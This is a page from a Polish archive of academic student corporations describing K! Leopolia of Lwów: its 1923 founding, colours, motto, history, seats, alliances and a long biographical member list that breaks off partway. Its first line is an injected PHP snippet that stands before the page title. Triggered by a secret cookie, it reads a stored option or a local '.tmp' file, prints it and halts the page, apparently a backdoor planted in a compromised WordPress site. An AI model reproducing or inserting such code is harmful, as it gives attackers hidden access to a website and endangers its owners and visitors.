if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

K! Leopolia

Dekiel Leopolii - vide Poszukiwania. Nazwa:
Polska Korporacja Akademicka “Leopolia”
Siedziba:
Lwów
Data powstania:
18 VI 1923 r.
Barwy:
amarantowa – złota – błękitna (pierwotnie ciemnoniebieska – złota – amarantowa)
Dewiza:
„Najwyższym prawem - dobro Narodu”

Rys historyczny

Banda frakowa (cieniutka) Jerzego Szajnera oraz banda komersowa (szarfa prezydialna ?).

Leopolia została założona dnia 18 VI 1923 r. przez grupę dziewięciu studentów Uniwersytetu Jana Kazimierza. Początkowo nosiła nazwę “Roxolania”, gdyż miała reprezentować młodzież pochodzącą z Rusi Czerwieńskiej (”Roxolania” to inna nazwa Rusi Czerwieńskiej). Pod koniec 1923 r. nazwa korporacji została jednak zmieniona na “Leopolia”, co z kolei miało trafniej wskazywać na związek nowej organizacji z miastem Lwów.

Herb Leopolii, 1933 r.

Od dnia 1 XI 1923 r. korporacja należała do Związku Polskich Korporacji Akademickich (data starszeństwa związkowego: 1 XI 1923 r.). Kandydowała pod opieką K! Lutyko-Venedya. Prawa członka rzeczywistego Związku uzyskała z dniem 8 XII 1924 r.

Leopolia należała do największych i najbardziej prężnych korporacji lwowskich. Od dnia 18 lutego 1925 r. istniało Koło Filistrów. Członkiem Leopolii byli: prezes Związku Polskich Korporacji Akademickich Jerzy Macieliński (1935-37) oraz prezesi Lwowskiego Koła Międzykorporacyjnego Jerzy Łoziński (1925/26) i Adam Macieliński (1929/30). Przy Leopolii kandydowało pięć korporacji: w latach 1926-28 K! Zagończyk, w latach 1927-28 K! Aragonia, w latach 1927-28 K! Obotritia, w latach 1931-32 K! Silvania, w latach 1932-34 K! Slavia.

Poczty sztandarowe Concordii (?) i Leopolii, lata 20-te (?).

Zawarła kartele: czasowy dnia 10 V 1925 r. z K! Concordia z Lublina (przedłużony na wieczysty dnia 10 II 1929 r.) oraz wieczysty dnia 30 I 1926 r. z K! Znicz ze Lwowa.

Przyjęcie nowych członków do Leopolii, Lwów prawd. lata 20-te.

Siedziby korporacji mieściły się: początkowo w salach Czytelni Akademickiej przy ul. Łozińskiego 7, w latach 1925-29 przy ul. Piłsudskiego 11 (Pańskiej 11), w latach 1929-34 przy ul. Tureckiej 3 (II piętro) oraz w latach 1934-39 przy ul. Mochnackiego 16.

Całkowita ustalona, choć niekompletna imienna lista członków obejmuje 166 nazwisk, w tym 16 członków honorowych.

Po wojnie w latach 70-tych odbywały się spotkania niewielkiej grupy członków korporacji.

Bal Leopolii z okazji X-lecia korporacji, Lwów 18 II 1933 r.

Lista członków

Poniższa, niekompletna lista członków Leopolii obejmuje ponad 165 nazwisk. Będziemy wdzięczni za jej uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samej korporacji (vide Poszukiwania).

Członkowie honorowi

 1. Wilhelm Bruchnalski, (21 maja 1859 we Lwowie - 6 grudnia 1938 we Lwowie) s. Antoniego Fabiana i Anny z Birtusów, ojciec Andrzeja (Leopolia), absolwent III Gimnazjum we Lwowie, student prawa 1878-82 i historii literatury 1882-85 ULw., doktorat 1885, wykładowca UJK, od 1900 doc., od 1904 prof. nadzw., od 1907 prof. zw., kierownik II Katedry Historii Literatury Polskiej 1907-31, dziekan Wydziału Filozoficznego UJK 1912-17, od 1905 członek-korespondent AU, od 1923 członek czynny PAU, prezes Towarzystwa Literackiego im. Adama Mickiewicza 1900-05 oraz 1918-34, wiceprezes 1908-17 i prezes 1917-26 Towarzystwa Ludoznawczego we Lwowie, doctor honoris causa USB 1929, Filister honorowy Leopolii (od marca 1925), znawca polskiej literatury późnego średniowiecza, renesansu, oświecenia i romantyzmu oraz kultury XIX-wiecznej Galicji, odznaczony m.in. Krzyżem Komandorskim Orderu Polonia Restituta, pochowany na Cmentarzu Łyczakowskim

  Leon Czapielowski, 1933 r.

 2. Leon Czapielowski (senior), ( - 1944) ojciec Leona (Leopolia), ziemianin zamordowany przez bandy UPA na swojej resztówce pod Krzemieńcem, Filister honorowy Leopolii

  Jan Czekanowski, 1933 r.

 3. Jan Czekanowski, (6 października 1882 w Głuchowie - 20 lipca 1965 w Szczecinie) uczeń Szkoły W. Górskiego w Warszawie oraz Gimnazjum w Libawie, studiował antropologię, anatomię, etnografię i matematykę na Uniwersytecie w Zurychu, doktorat 1907, po studiach pracował w Królewskim Muzeum Ludoznawczym w Berlinie (m.in. prowadził badania międzyrzecza rzek Kongo-Nil), a od 1910 Muzeum Antropologii i Etnografii w Petersburgu, od 1913 wykładowca ULw., kierownik Zakładu Antropologicznego na ULw., rektor UJK 1934-36, po wojnie kierownik Katedry Antropologii UAM, Filister honorowy Leopolii (od 2 maja 1927), doctor honoris causa UAM 1962

 4. Włodzimierz hr. Dzieduszycki, (10 maja 1885 we Lwowie - 9 września 1971 w Warszawie) s. Tadeusza i Anny z hr. Dzieduszyckich, absolwent Gimnazjów w Sankt Petersburgu oraz w Krakowie, student PL i UJ, od 1918 IV ordynat Ordynacji Dzieduszyckich, opiekun Muzeum Przyrodniczego im. Dzieduszyckich we Lwowie, w czasie wojny polsko-bolszewickiej zorganizował na własny koszt oddział z Zarzecza, działacz Stronnictwa Narodowego oraz organizacji ziemiańskich, Filister honorowy Leopolii (od marca 1925) oraz Gnomii, autor słów do “Kurdesza korporacyjnego”, w 1944 usunięty przez komunistów z maj. w Zarzeczu, po wojnie osiadł w Warszawie, pracował w Instytucie Zoologii PAN, autor prac z zakresu ornitologii i muzealnictwa, odznaczony francuskim orderem d’Officier du Mérite agricole 1924

  Antoni Konopacki, 1933 r.

 5. Antoni Konopacki, ( - 1940 we Lwowie) dr praw, adwokat we Lwowie, działacz Stronnictwa Narodowego, Filister honorowy Leopolii, aresztowany w wyniku prowokacji NKWD, zamordowany przez NKWD

 6. Maksymilian Liptay, dyrektor banku, współzałożyciel Orbisu, Filister honorowy Leopolii
 7. Jan Opieński, bakteriolog, prof. UJK, Filister honorowy Leopolii i Avanguardii
 8. Michał Pawlikowski, (ur. w Medyce - ) Filister honorowy Leopolii [być może Michał Gwalbert Pawlikowski (2 marca 1887 w Wiedniu - 1970) s. Jana i Wandy z Abramowiczów]

  Konrad Zdzisław Próchnicki, 1933 r.

 9. Konrad Zdzisław Próchnicki, (1875 - 18 października 1939 we Lwowie) s. Franciszka i Wandy z d. Łuczkiewicz, dr praw, zastępca prof. prawa politycznego UJK, działacz demokratyczny, Filister honorowy Leopolii

 10. Jan Rozwadowski, dr, Filister honorowy Leopolia [prawd. Jan Emanuel Rozwadowski (6 sierpnia 1872 w Babinie nad Łomnicą k. Kałusza - 19 marca 1935 w Warszawie) dr ekonomii UJ 1895, polityk, działacz niepodległościowy związany z Narodową Demokracją, po I wojnie światowej dyrektor Banku Ziemskiego we Lwowie]
 11. Tadeusz Jordan-Rozwadowski, (19 maja 1866 w Babinie - 18 października 1928 w Warszawie) studiował Wojskowej Akademii Technicznej w Wiedniu 1882-1886, absolwent Szkoły Wojennej w Wiedniu 1891, oficer armii austriackiej do 1916, Feldmarschalleutnant (polski odpowiednik generała dywizji), organizator WP i Szef Sztabu Generalnego X-XI 1918, od XI 1918 Naczelny Dowódca WP w Galicji Wschodniej, Szef Polskiej Misji Wojskowej w Paryżu 1919-20, szef Sztabu Generalnego WP i współautor wygranej bitwy warszawskiej 1920, Generalny Inspektor Jazdy 1921-26, w czasie zamachu majowego po stronie legalnego rządu kierował obroną Warszawy, po przejęciu władzy przez J. Piłsudskiego, przeniesiony na emeryturę 1927, gen. broni WP, Filister honorowy Leopolii
 12. Józef Siemiradzki, (1858 - 11 stycznia 1933 we Lwowie) s. Telesfora, c. I sem. 1878, paleontolog, geolog, prof., dziekan, rektor ULw., członek PAU, Filister rzeczywisty Konwentu Polonia (nr ew. 789), Filister honorowy Leopolii (od 1927)
 13. Władysław Sikorski, (20 maja 1881 w Tuszowie Narodowym - 4 lipca 1943 na Gibraltarze) s. Tomasza i Emilii z d. Albertowicz, przed I wojną światową współzałożyciel kilku nielegalnych polskich organizacji niepodległościowych, w tym m.in. Związku Walki Czynnej, w trakcie I wojny światowej żołnierz Legionów Polskich, od 1919 oficer WP, w początkach II Rzeczypospolitej czołowy polityk kraju, m.in. premier 1922-23 oraz minister spraw wojskowych 1923-24, po przewrocie majowym w 1926 w opozycji, w 1936 sygnatariusz antysanacyjnego Frontu Morges, w czasie II wojny światowej Naczelny Wódz Polskich Sił Zbrojnych i premier Rządu na Uchodźstwie 1939-43, Filister honorowy Leopolii i Scythii
 14. Leonard Stahl, (18 października 1866 - 2 grudnia 1929) ojciec Zdzisława (Leopolia), prawnik, adwokat, polityk związany z narodową demokracją, obrońca Lwowa, uczestnik wojny polsko-bolszewickiej 1920, członek Rady Naczelnej Związku Ludowo-Narodowego, członek Prezydium Rady Dzielnicowej Stronnictwa Narodowego, wiceprezydent Lwowa, Filister honorowy Leopolii i Znicza, pochowany prawdopodobnie na Cmentarzu Obrońców Lwowa

  Stanisław Starzyński, 1933 r.

 15. Stanisław Starzyński, (18 kwietnia 1853 w Snowiczu pow. Złoczów - 17 listopada 1935 we Lwowie) ze Starzyniec, s. Bojomira i Zofii z Kulczyckich, absolwent Gimnazjum im. Franciszka Józefa we Lwowie 1872, absolwent (z odznaczeniem) prawa ULw. 1876, dr praw 1879, współzałożyciel i prezes Biblioteki Słuchaczów Prawa oraz Czytelni Akademickiej, habilitacja z austriackiego prawa politycznego 1883, wykładowca prawa politycznego (konstytucyjnego) ULw. 1883-1935, od 1889 prof. nadzw., od 1892 prof. zw., kierownik katedry prawa politycznego do 1925, dziekan Wydziału Prawa 1895/96 i 1918/19, rektor 1913/14 oraz prorektorem 1914/15, po przejściu na emeryturę prof. honorowy UJK, działacz polityczny, m.in. poseł w Sejmie Krajowym we Lwowie 1907-13, członek wiedeńskiej Izby Poselskiej (Rady Państwa) 1884-88, 1901-07 i 1907-11, autor i współautor licznych aktów prawnych dot. prawa wyborczego, prawa konstytucyjnego i prawa administracyjnego, wiceprezydent Izby Poselskiej 1907-11, w 1909 przyczynił się do rozszerzenia autonomii Galicji (tzw. lex Starzyński), członek austriackiej Izby Panów 1917-18, w II RP miał cieszyć się opinią najwybitniejszego znawcy prawa konstytucyjnego, członek AU (późniejszej PAU), doktor honoris causa USB, obywatel honorowy Rawy Ruskiej, Sokala i Żółkwi, Filister honorowy Leopolii, Roxolanii, Avanguardii, prezes Koła Filistrów Avanguardii, pośmiertnie odznaczony Dyplomem i Złotą Odznaką ZPKA 1937, pochowany w kaplicy przypałacowej w wiosce Derewni k. Żółkwi

 16. Kasper Weigel, (10 czerwca 1880 we Lwowie - 4 lipca 1941 we Lwowie) ojciec Józefa (Leopolia), absolwent niemieckiego II Gimnazjum we Lwowie 1898, student Wydziału Inżynierii PL 1898-03, po studiach pracował jako inż. przy budowie kolei Lwów-Podhajce, od 1908 wykładowca w Katedrze Miernictwa PLw., doktorat 1909, habilitacja 1911, od 1912 prof. nadzw., od 1918 prof. zw., od 1920 kierownik Katedry Miernictwa, dziekan Wydziału Inżynierii Lądowej, rektor UJK 1929/30, Filister honorowy Leopolii, aresztowany wraz z ojcem, zamordowany przez Niemców na Wzgórzach Wuleckich

Członkowie rzeczywiści

  Tadeusz Banachiewicz, 1933 r.

 1. Tadeusz Banachiewicz, z Krakowa, student PL, akt. 1931-38
 2. Henryk Batowski, (12 maja 1907 we Lwowie - 25 marca 1999 w Krakowie) student i absolwent historii UJK, akt. 1925-30, historyk i slawista, prof. UJ

 3. Jan Bączkowski,
 4. Tadeusz Bertoni, student prawa UJK, akt. 1924-27, wiceprezes Bratniej Pomocy Studentów UJK 1921/22, dr praw, dyplomata
 5. Aleksander Biliński, “Leszek”, student i absolwent prawa UJK, akt. 1930-35, kierował wytwórnią kilimów w Laszczkowie pod Lwowem, aresztowany przez Gestapo w Leszczykowie w 1941, wywieziony do Niemiec, osadzony w obozie koncentracyjnym przy wyrobie “Vergeltungswaffe” i tam zamordowany
 6. Stanisław Biliński, student prawa UJK, wiceprezes Czytelni Akademickiej 1929, działacz Organizacji Młodych Monarchistów

  Roman Bielski, 1933 r.

 7. Roman Bielski, (1913 w Jaśle - 1988 w Katowicach) absolwent Gimnazjum w Jaśle 1931, student architektury PL, akt. 1931-37, delegat na X Zjazd ZPKA, dyplom inż. architekta po wojnie

 8. Władysław Biesiada, student prawa UJK, założyciel Leopolii
 9. Zdzisław Bissinger, student prawa UJK, akt. 1930-35, prawnik
 10. Roman Bodakowski, ( - 1941) student PL

  Bronisław Bohosiewicz, 1928 r.

 11. Bronisław Bohosiewicz, (1904 - 1956 w Gliwicach) student i absolwent prawa UJK, akt. 1925-33, sekretarz sem. zim. 1925/26, olderman 1927, prezes sem. zim 1928/29, sekretarz Lwowskiego Koła Międzykorporacyjnego 1928/29

 12. Karol Borkowski, (13 października 1916 we Lwowie - 18 maja 1987 w Krakowie) akt. 1933-39, dr praw, po wojnie radca prawny w Krakowie
 13. Stanisław Boziewicz,
 14. Andrzej Bruchnalski, ( - ok. 1985 w Wojniczu) s. Wilhelma (Leopolia), akt. 1925-30, sekretarz sem. let. 1926/27
 15. Stanisław Brzozowski, (12 marca 1917 w Gliniku Mariampolskim - 4 lutego 1996 w Krakowie) akt. 1933-34, wystąpił, prof. PAN w Krakowie
 16. Zdzisław Bucki, ( - 1992) student Akademii Handlu Zagranicznego, c. 1938/39

  Leon Czapielowski, 1933r.

 17. Leon Czapielowski (junior), s. Leona (Leopolia), student prawa UJK, akt. 1928-35, prezes sem. zim. i sem. let. 1931/32, prezes sem. zim. 1932/33, olderman 1933, wiceprezes Czytelni Akademickiej 1933, zamordowany przez odziały UPA pod Krzemieńcem

 18. Roman Czernecki, (15 maja 1904 - 13 grudnia 1986) polonista, filozof, prof. Liceum Krzemienieckiego, Gimnazjum im Śniadeckich w Kielcach, kierownik konspiracyjnego Gimnazjum w Słupi k. Kielc, żołnierz AK ps. ”Wrzos”, dyrektor Zakładów Naukowych w Szczecinach, rektor Wyższej Szkoły Pedagogicznej w Gdańsku, wykładowca filozofii PW, pochowany na Powązkach w Warszawie

  Wacław Czyżewski, 1933 r.

 19. Wacław Czyżewski, ( - 1970 w Londynie) akt. 1928-35, prezes sem. let. 1932/33, kurator Korporacji Slavia, po wojnie na emigracji w Wielkiej Brytanii

 20. Antoni Deryng, prezes Czytelni Akademickiej 1922, prof. KUL
 21. Stefan Downarowicz, inż.
 22. Bolesław Dziemski, dr
 23. Zbigniew Ekert (Eckert), akt. 1933-39
 24. Jan Ernst, (1909 - 26 października 1993 w Warszawie) s. Marcina (Zagończyk) student UJK, c. 1927, akt. 1927-32, założył chór “Eryana”, po II wojnie prof. geografii UMCS Lublin, wydał pamiętniki “Dwie linie życia” (t. j-2, Warszawa 1988), członek Zarządu Stowarzyszenia Filistrów Polskich Korporacji Akademickich 1993
 25. Gabriel Fiałkowski, brat Stanisława (Leopolia), akt. 1927-32
 26. Stanisław Fiałkowski, brat Gabriela (Leopolia)

  Fiedler, 1933 r.

 27. Fiedler, student PL

 28. Albin Filipczuk, akt. 1934-39, mgr praw, prezes Ligi Polsko-Rumuńskiej

  Lesław Gabriel de Crystiori, 1933 r.

 29. Lesław Gabriel de Crystiori, (1913 we Lwowie - 25 lutego 1996 w Krakowie) student UJK i PL, akt. 1934-39, student UJ, mgr prawa, radca prawny

 30. Lesław Galeński, (10 lutego 1917 w Bielsku Białej - ) student i absolwent UJK 1939, c. 1938, akt. 1938-39, dr praw UJK 1945, adwokat, działacz społeczny, doradca małopolskiej “Solidarności”, Filister honorowy Slavii (od 1994)
 31. Roman Garbiak, akt. 1927-32, wiceprezes sem. zim 1928/29, kurator Obotritii, lekarz med.
 32. Tadeusz Garbiak, (?) geograf, po wojnie na emigracji w Wielkiej Brytanii
 33. Jerzy Roman Gerżabek, (22 kwietnia 1903 - 7 września 1939 pod Łęczycą) student prawa UJK, założyciel Leopolii, akt. 1923-27, autor słów “Pieśni do barw” Leopolii, mgr praw, teatrolog, twórca “Kukiełki” w Poznaniu, ppor. rez. kawalerii, w wojnie obronnej 1939 w Brygadzie Wielkopolskiej pod Łęczycą, poległ, pochowany w Ostrzeszowie
 34. Zdzisław Gojawiczyński, (1904 - 18 III 1925) student Wyższej Szkoły Handlu Zagranicznego, członek Zarządu Towarzystwa Biblioteki Słuchaczy Prawa, popełnił samobójstwo

  January Grabowski, po 1945 r.

 35. January Grabowski, (1905 we Lwowie - listopad 1986 w Warszawie) s. Stanisława i Zofii z Szumowskich, akt. 1925-31 w Leopolii, sekretarz sem. let. 1925/26, skarbnik Lwowskiego Koła Międzykorporacyjnego 1929/30, przeniósł się na UJ i do Korporacji Akropolia (?)

 36. Zenon Grabowski, akt. 1924-28 w Leopolii, przeniósł się na UJ i do Korporacji Akropolia, prawnik (?)
 37. Zenon Graziadio, ( - 1976 w Sosnowcu) po wojnie dyrektor teatru w Rzeszowie
 38. Zdzisław Gutteter,
 39. Kazimierz Harlender, (1903 - 1997 w Węgierskiej Górce) inż. leśnik
 40. Zbigniew Hirsch [po wojnie Czachowski], (1910 - 1989 w Gliwicach) inż. mechanik

  Tadeusz Hirchler, 1933 r.

 41. Tadeusz Hirchler, (1910-2001) student prawa UJK

 42. Arkadiusz Hlawaty, ( - 1963 w Krakowie) akt. 1934-38, mgr praw, radca prawny
 43. Roman Hoszowski, student PL
 44. Antoni Idzikowski, ( - 1931) student PL, pochowany z ceremoniałem korporacyjnym
 45. Józef Zbigniew Jabłoński, po wojnie na emigracji w Kanadzie
 46. Eugeniusz Janicki, (?)
 47. Kazimierz Janiczek, sekretarz sem. let. 1928/29, wystąpił 1934
 48. Ludwik Jarzykowski, (1914 - 27 października 1978 w Hiszpanii) absolwent III Gimnazjum im. Króla Stefana Batorego we Lwowie, student i absolwent prawa UJK, akt. 1933-37, wstąpił do korpusu sądowego WP i wystąpił z Korporacji, mjr dypl., w wojnie obronnej 1939 obrońca Lwowa, w II Korpusie w 5 Dywizji Kresowej Piechoty, odznaczony Krzyżem Walecznych, po wojnie na emigracji prawd. w Hiszpanii
 49. Aleksander Jaworczak, akt. 1934 - 38, mgr polonistyki nauczyciel szkół średnich
 50. Łukasz Juśkiewicz, ( - jesienią 1928) akt. 1928, pochowany z ceremoniałem korporacyjnym

  Stanisław Juśkiewicz, 1933 r.

 51. Stanisław Juśkiewicz (Jóźkiewicz), (1910 - 19 grudnia 1994 w Katowicach) student i absolwent med. UJK, c. 1935, prof. i rektor Akademii Medycznej w Zabrzu

 52. Jan Kamieński,

  Erwin Kesselring, 1933 r.

 53. Erwin Kesselring, student prawa UJK, akt. 1930-35

 54. Jan Kielanowski, (16 kwietnia 1910 we Lwowie - 16 stycznia 1989 Warszawie) brat Leopolda (Leopolia), prof. zootechniki, twórca oraz dyrektor Instytut Fizjologii i Żywienia Zwierząt PAN w Jabłonnie pod Warszawą, od 1961 członek PAN, działacz opozycji, sygnatariusz Listu 59 przeciw zmianom w konstytucji 1976, członek KOR, współorganizator nielegalnego Towarzystwa Kursów Naukowych, członek i wielki mistrz 1981-86 loży masońskiej “Kopernik”, w 1979 miał odrzucić propozycję Prezydenta Edwarda hr. Raczyńskiego objęcia po nim godności prezydenta na uchodźctwie
 55. Leopold Pobóg-Kielanowski, (1907 - 3 stycznia 1988) brat Jana (Leopolia), absolwent VIII Państwowego Gimnazjum Realnego im. Króla Kazimierza Wielkiego we Lwowie, po studiach aktor i dyrektor teatru w Wilnie, artysta, teatrolog, reżyser w Londynie, pracownik Radia Wolna Europa
 56. Adam Klimowicz, ( - 4 lutego 1981) absolwent IV Gimnazjum we Lwowie 1935, mgr praw, po wojnie radca kulturalny ambasady w Wiedniu
 57. Zbigniew Kolączkowski, (3 kwietnia 1908 w Nowym Sączu - ok. 1980 w Szczawnicy) “Chrzan”, student i absolwent 1935 med. UJK, po wojnie lekarz w Szczawnicy, działacz w klubie motorowym w Szczawnicy

  Tadeusz Kopaczek.

 58. Tadeusz Kopaczek, (1911 - po 1960) student i absolwent ok. 1938 PL, w czasie okupacji aresztowany i osadzony w obozie w Auschwitz, po wojnie pracownik PW, w 1953 uciekł na Zachód, wyemigrował do Stanów Zjednoczonych

 59. Roman Kossowski-Hauer, lekarz med.
 60. Stanisław Kotulski,
 61. Kowalski, inż. mechanik, po wojnie na emigracji w Stanach Zjednoczonych
 62. Tadeusz Kownacki, ( - 24 sierpnia 1930) student prawa UJK, akt. 1926-30, zdobył puchar w zawodach szermierczych Lwowskiego Koła Międzykorporacyjnego w 1928, skarbnik Towarzystwa Bilioteki Słuchaczy Prawa 1929/30
 63. Stanisław Kraus, ( - w Wałbrzychu) inż. mechanik
 64. Stanisław Krzyżanowski, “Kraju”, założyciel Leopolii
 65. Roman Kumanowski, student PL
 66. Zbigniew Kurtz, ( - 27 marca 1980 w Bytowie) akt. 1931-38, po wojnie dyrektor liceum w Bytowie
 67. Mieczysław Kuźmiński, inż.

  Jerzy Kühnel, 1933 r.

 68. Jerzy Kühnel, mgr inż., po wojnie osiadł w Elblągu

 69. Stanisław Lenartowicz,

  Zdzisław Leńko (?), 1933 r.

 70. Zdzisław Leńko, (1907-1999) akt. 1926-33, olderman sem. zim i sem. let. 1928/29, prezes sem. zim. 1929/30, mgr praw, adwokat

  Włodzimierz Lewik, 1945 r.

 71. Włodzimierz Lewik, (8 kwietnia 1905 w Krakowie - 19 października 1962 w Warszawie) s. Stanisława (urzędnika skarbowego) i Bronisławy z Richterów, absolwent Gimnazjum w Samborze 1924, student i absolwent polonistyki UJK 1926-32 (dr filozofii), c. 1926, ślub korporacyjny 1926, absolwent podchorążówki, ppor. rez., poeta, w wojnie obronnej 1939 walczył w obronie Lwowa, po przekroczeniu granicy rumuńskiej 18 września 1939 internowany, a następnie przekazany do Oflagu w Dorsten, skąd został przeniesiony do Oflagu w Doessel, gdzie przebywał do wkroczenia wojsk alianckich w marcu 1945, w oflagu prowadził kółko teatralne i uczył języków obcych, pochowany na warszawskich Powązkach (br. IV, kw. 55, rz. 1, g. 15) [Źródła (poza wskazanymi poniżej spisu członków): relacja Zdzisławy Lewik; więcej PSB, t. XVII/2, s. 236]

  Jerzy Łoziński, 1933 r.

 72. Jerzy Łoziński, ( - ok. 1972 w Warszawie) student prawa UJK, założyciel Leopolii, akt. 1923-28, olderman 1923/24, prezes 1924/25, olderman sem. zim. 1925/26, prezes sem. let. 1925/26, prezes Lwowskiego Koła Międzykorporacyjnego 1925/26, mgr praw, adwokat

 73. Wiesław Machan, (1909 - 25 lipca 1993 w Warszawie) akt. 1927-30, mgr inż. PL, muzyk i kompozytor, w czasie studiów prowadził własną orkiestrę taneczną, po wojnie dyrektor teatru Syrena

  Adam Macieliński, 1931 r. (?).Adam Macieliński, 1933 r.

 74. Adam Macieliński, (1908 w Zborowie - 1961 ?) absolwent Gimnazjum w Drohobyczu, akt. 1926-33, sekretarz sem. zim 1928/29, wiceprezes sem. let. 1928/29, prezes sem. let. 1929/30, prezes sem. zim. 1930/31, olderman 1931, prezes Lwowskiego Koła Międzykorporacyjnego 1929/30, delegat na IV Radę Naczelną i IX Zjazd ZPKA, sekretarz 1927/28 oraz wiceprezes 1928/29 i 1929/30 Towarzystwa Biblioteki Słuchaczy Prawa, prezes Czytelni Akademickiej 1931 i 1932, prezes Lwowskiego Komitetu Akademickiego 1932/33, po wojnie na emigracji w Stanach Zjednoczonych, założył “Horyzonty”

  Jerzy Witold Macieliński, 1933 r.

 75. Jerzy Witold Macieliński, (26 stycznia 1910 w Zborowie - 20 czerwca 1975 w Birmingham w Wielkiej Brytanii) akt. 1927-36, sekretarz sem. zim. i sem. let. 1929/30, wiceprezes sem. zim. 1932/33, olderman sem. zim. 1933/34, kurator Slavii 1933/34, prezes ZPKA 1935-37 (XIV kadencja), delegat na IX, XII i XIII Zjazd ZPKA, odznaczony Dyplomem Zasługi i Złotą Odznaką ZPKA, inż. mechanik, ppor. rez. piechoty, w kampanii wrześniowej walczył w dywizji podolskiej, przeszedł na Węgry, dowódca kompanii kpt. broni pancernej pod Monte Cassino, po wojnie na emigracji w Wielkiej Brytanii, redaktor “Horyzontów”

 76. Malsburg, akt. 1928
 77. Kazimierz Małecki, (1907-1992)

  Ludwik Manz, 1933 r.

 78. Ludwik Manz, inż.

 79. Stanisław Mikulski, akt. 1930-37
 80. Władysław Mikuszewski, założyciel Leopolii, olderman sem. let. 1924/25, prawnik
 81. Stanisław Misky, ( - 1969) c. 1923, olderman wiceprezes sem. zim. 1925/26, olderman sem. let. 1925/26, kurator Aragonii, mgr praw, adwokat
 82. Jerzy Mokrzycki, prawnik
 83. Mieczysław Morderer, student prawa UJK, akt. 1927-33, prawnik, słynny “Aprikosenkranz” Wesołel Lwowskiej Fali, po wojnie na emigracji
 84. Ignacy Nędzowski, (26 lipca 1904 w Sokalu - 11 października 1978 w Londynie) obrońca Lwowa 1918, c. 1923, akt. 1923-27, wiceprezes sem. let. 1926/27, dr praw, sędzia w Tarnopolu, a później adwokat, mjr rez. kawalerii, deportowany na Syberię, żołnierz Samodzielnej Brygady Karpackiej, uczestnik kampanii włoskiej, po wojnie na emigracji w Wielkiej Brytanii
 85. Roman Nowakowski, inż. mechanik, skarbnik sem. let. 1925/26, olderman sem. zim. 1929/30, sekretarz Lwowskiego Koła Międzykorporacyjnego 1929/30, po wojnie na emigracji
 86. Władysław Opolski, (21 maja 1915 w Obersedlitz w Czechach - 11 lipca 1980) student i absolwent 1938 med. UJK, akt. 1932-39, prezes 1938, delegat na IX Radę Naczelną ZPKA, dr med. 1950, chirurg, po wojnie dyrektor szpitala w Zabrzu
 87. Kazimierz Ostrowski,
 88. Jerzy Pacześniowski, (1913 w Jaśle - 1996 w Katowicach) absolwent Gimnazjum w Jaśle, akt. 1932-39, pchor. rez. piechoty, po kampanii wrześniowej pozostał w Rumunii, po wojnie wrócił do kraju
 89. Oktaw Pietruski, (20 marca 1904 w Mościcach k. Lwowa - 27 stycznia 1981 w Warszawie) herbu Starykoń, student prawa UJK, akt. 1924-29, prezes sem. let. 1926/27 oraz prawd. sem. zim. i sem. let. 1927/28, ślub z Józefą Pobóg Kielanowską w październiku 1927 w katedrze lwowskiej z ceremoniałem korporacyjnym, sekretarz 1925 i wiceprezes 1926 Towarzystwa Biblioteki Słuchaczy Prawa, dr praw UJK i UJ, w latach 1930-39 kurator Fundacji im. Pietrsuskich w Rudzie k. Kochawiny i sędzią w Żydaczowie, adwokat w Strzyżowie k. Rzeszowa 1942-45, a po wojnie adwokat w Warszawie 1945-74, autor rozpraw filozoficzno-egzystencjalnych
 90. Eugeniusz Pilch, student AMW, akt. 1932-38, prezes Bratniej Pomocy Studentów AMW 1937, lekarz weterynarii

  Zbigniew Piszczek, 1933 r.

 91. Zbigniew Piszczek, (1912 - ok. 1980) inż. mechanik 1938, pchor. rez. lotnictwa, w Polskich Siłach Zbrojnych, oficer techniczny RAF w Dywizjonie 303, po wojnie przez pięć lat organizował służbę techniczną kolei nigeryjskich w Ghanie

 92. Tadeusz Piszczykowski (Piszczkowski), (16 lutego 1904 w Mielnicy n. Dniestrem w woj. tarnopolskim - 1990 w Londynie) s. Zygmunta i Marii Wiktorii z d. Piętkowskiej, uczeń Gimnazjum im. Adama Mickiewicza 1915-21 i Gimnazjum im. Henryka Sienkiewicza we Lwowie 1921-1922, gdzie zdał maturę, student i absolwent prawa UJK 1922-27, studiował także w Szkole Studiów Wyższych Międzynarodowych na Sorbonie w Paryżu 1927-29, dr praw UJK 1929, założyciel Leopolii, wiceprezes 1923/24 i 1924/25 (do marca 1925), delegat na V i VII Zjazd ZPKA, sekretarz 1922 oraz wiceprezes 1925 i 1926 Czytelni Akademickiej, działacz Związku Młodych Narodowców, dr praw, od 1933 pracownik MSZ, prof. polskiego Uniwersytetu w Londynie, po wojnie na emigracji w Wielkiej Brytanii, pracownik Radia Wolna Europa [Źródła (poza wskazanymi poniżej spisu członków): L. Gawlikowski, Pracownicy Radia Wolna Europa. Biografie zwykłe i niezwykłe, Warszawa 2015)
 93. Marian Podhrebelny, ( - 1972) student prawa UJK, akt. 1924-28, sekretarz 1924/25, wiceprezes Towarzystwa Biblioteki Słuchaczy Prawa 1926/27, mgr praw

  Rajmund Połoch, 1936 r. (?).

 94. Rajmund Połoch, (1914 w Drohobyczu - 1996 w Bytomiu) prezes 1936, prezes chóru akademickiego UJK, mgr geografii UJK, po wojnie dyrektor liceum w Bytomiu

 95. Zygmunt Pressler, akt. 1925-30, mgr praw

  Marian Prokesch, 1933 r.

 96. Marian Prokesch, (1910 - 1991 w Jordanowie) “Prowizor”, wiceprezes 1933

 97. Kazimierz Przesmycki, mgr praw
 98. Pyrek,
 99. Zbigniew Rajewski, z Jasła, prawnik
 100. Jan Riedel, ( - po 1975) inż.
 101. Roman Rozwadowski, inż. geodeta
 102. Władysław Rudzki, akt. 1933-39
 103. Jan Ruxer, (1912-1995) absolwent III Gimnazjum we Lwowie, pchor., w wojnie obronnej 1939 stracił rękę pod Gródkiem Jagiellońskim

  Zbigniew Schneigert, 1993 r.

